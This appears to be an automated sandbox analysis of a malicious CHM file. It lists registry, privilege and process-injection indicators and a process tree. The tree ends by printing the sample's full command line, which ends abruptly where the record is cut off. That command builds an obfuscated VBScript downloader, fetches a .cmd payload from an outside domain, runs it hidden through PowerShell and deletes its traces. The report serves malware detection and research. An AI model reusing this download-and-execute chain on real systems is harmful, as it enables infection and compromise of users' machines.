Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TieringEngineService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	TieringEngineService.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
1016	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1130 = "Microsoft Modem Device Provider"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21825 = "3D Objects"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000ae19f9c5b56bdb01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\zipfldr.dll,-10195 = "Compressed (zipped) Folder"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1134 = "Microsoft Routing Extension"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-116 = "Microsoft Excel Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-914 = "SVG Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-103 = "Windows PowerShell Script"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithList	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000a19292c5b56bdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9923 = "Windows Media playlist"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9925 = "MP3 Format Sound"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-180 = "Microsoft PowerPoint 97-2003 Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{80009818-F38F-4AF1-87B5-EADAB9433E58} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000e31e7dc5b56bdb01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-184 = "Microsoft PowerPoint Macro-Enabled Design Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9910 = "Windows Media Audio/Video playlist"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9933 = "MPEG-4 Audio"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia\ActiveMovie	SearchFilterHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000df6b8bc5b56bdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-182 = "Microsoft PowerPoint Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-127 = "OpenDocument Text"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9939 = "ADTS Audio"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\windows.storage.dll,-10152 = "File folder"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-10046 = "Internet Shortcut"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4804 = "JavaScript File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-120 = "Microsoft Word 97 - 2003 Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9938 = "3GPP2 Audio/Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1133 = "Print"	fxssvc.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000041d34fc5b56bdb01	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000df6b8bc5b56bdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-125 = "Microsoft Word Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-34583 = "Saved Pictures"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000355a78c5b56bdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9914 = "Windows Media Audio/Video file"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-114 = "OpenDocument Spreadsheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-113 = "Microsoft Excel Binary Worksheet"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000097878ac6b56bdb01	SearchProtocolHost.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	27	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
112	powershell.exe
112	powershell.exe
1844	powershell.exe
1844	powershell.exe
2248	aken.pif
2248	aken.pif
2248	aken.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
2548	xbnitqnH.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif
1928	svchost.pif

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	112	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	2248	aken.pif
Token: SeTakeOwnershipPrivilege	2548	xbnitqnH.pif
Token: SeDebugPrivilege	2548	xbnitqnH.pif
Token: SeAuditPrivilege	5704	fxssvc.exe
Token: SeRestorePrivilege	5500	TieringEngineService.exe
Token: SeManageVolumePrivilege	5500	TieringEngineService.exe
Token: SeAssignPrimaryTokenPrivilege	4796	AgentService.exe
Token: SeBackupPrivilege	4372	vssvc.exe
Token: SeRestorePrivilege	4372	vssvc.exe
Token: SeAuditPrivilege	4372	vssvc.exe
Token: SeBackupPrivilege	5144	wbengine.exe
Token: SeRestorePrivilege	5144	wbengine.exe
Token: SeSecurityPrivilege	5144	wbengine.exe
Token: 33	5388	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5388	SearchIndexer.exe
Token: SeDebugPrivilege	2548	xbnitqnH.pif
Token: SeDebugPrivilege	2548	xbnitqnH.pif
Token: SeDebugPrivilege	2548	xbnitqnH.pif
Token: SeDebugPrivilege	2548	xbnitqnH.pif
Token: SeDebugPrivilege	2548	xbnitqnH.pif

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3748	hh.exe
3748	hh.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 3748 wrote to memory of 1260	3748	hh.exe	82
PID 3748 wrote to memory of 1260	3748	hh.exe	82
PID 1260 wrote to memory of 3640	1260	cmd.exe	84
PID 1260 wrote to memory of 3640	1260	cmd.exe	84
PID 1260 wrote to memory of 112	1260	cmd.exe	85
PID 1260 wrote to memory of 112	1260	cmd.exe	85
PID 112 wrote to memory of 4400	112	powershell.exe	86
PID 112 wrote to memory of 4400	112	powershell.exe	86
PID 1260 wrote to memory of 1844	1260	cmd.exe	87
PID 1260 wrote to memory of 1844	1260	cmd.exe	87
PID 1844 wrote to memory of 4672	1844	powershell.exe	88
PID 1844 wrote to memory of 4672	1844	powershell.exe	88
PID 1260 wrote to memory of 1016	1260	cmd.exe	90
PID 1260 wrote to memory of 1016	1260	cmd.exe	90
PID 4672 wrote to memory of 1980	4672	cmd.exe	92
PID 4672 wrote to memory of 1980	4672	cmd.exe	92
PID 4672 wrote to memory of 2344	4672	cmd.exe	93
PID 4672 wrote to memory of 2344	4672	cmd.exe	93
PID 4672 wrote to memory of 2344	4672	cmd.exe	93
PID 2344 wrote to memory of 3452	2344	x.exe	100
PID 2344 wrote to memory of 3452	2344	x.exe	100
PID 2344 wrote to memory of 3452	2344	x.exe	100
PID 2344 wrote to memory of 3600	2344	x.exe	102
PID 2344 wrote to memory of 3600	2344	x.exe	102
PID 2344 wrote to memory of 3600	2344	x.exe	102
PID 3600 wrote to memory of 1928	3600	cmd.exe	104
PID 3600 wrote to memory of 1928	3600	cmd.exe	104
PID 1928 wrote to memory of 1804	1928	svchost.pif	105
PID 1928 wrote to memory of 1804	1928	svchost.pif	105
PID 1804 wrote to memory of 4680	1804	cmd.exe	107
PID 1804 wrote to memory of 4680	1804	cmd.exe	107
PID 1804 wrote to memory of 4944	1804	cmd.exe	108
PID 1804 wrote to memory of 4944	1804	cmd.exe	108
PID 1804 wrote to memory of 1588	1804	cmd.exe	109
PID 1804 wrote to memory of 1588	1804	cmd.exe	109
PID 1804 wrote to memory of 3304	1804	cmd.exe	110
PID 1804 wrote to memory of 3304	1804	cmd.exe	110
PID 3304 wrote to memory of 2228	3304	alpha.pif	117
PID 3304 wrote to memory of 2228	3304	alpha.pif	117
PID 1804 wrote to memory of 1980	1804	cmd.exe	112
PID 1804 wrote to memory of 1980	1804	cmd.exe	112
PID 1980 wrote to memory of 1608	1980	alpha.pif	113
PID 1980 wrote to memory of 1608	1980	alpha.pif	113
PID 1804 wrote to memory of 4312	1804	cmd.exe	114
PID 1804 wrote to memory of 4312	1804	cmd.exe	114
PID 4312 wrote to memory of 2248	4312	alpha.pif	139
PID 4312 wrote to memory of 2248	4312	alpha.pif	139
PID 2344 wrote to memory of 2548	2344	x.exe	116
PID 2344 wrote to memory of 2548	2344	x.exe	116
PID 2344 wrote to memory of 2548	2344	x.exe	116
PID 2344 wrote to memory of 2548	2344	x.exe	116
PID 2344 wrote to memory of 2548	2344	x.exe	116
PID 5388 wrote to memory of 3464	5388	SearchIndexer.exe	145
PID 5388 wrote to memory of 3464	5388	SearchIndexer.exe	145
PID 5388 wrote to memory of 6040	5388	SearchIndexer.exe	146
PID 5388 wrote to memory of 6040	5388	SearchIndexer.exe	146

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xbnitqnH.pif

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xbnitqnH.pif

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3748
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM 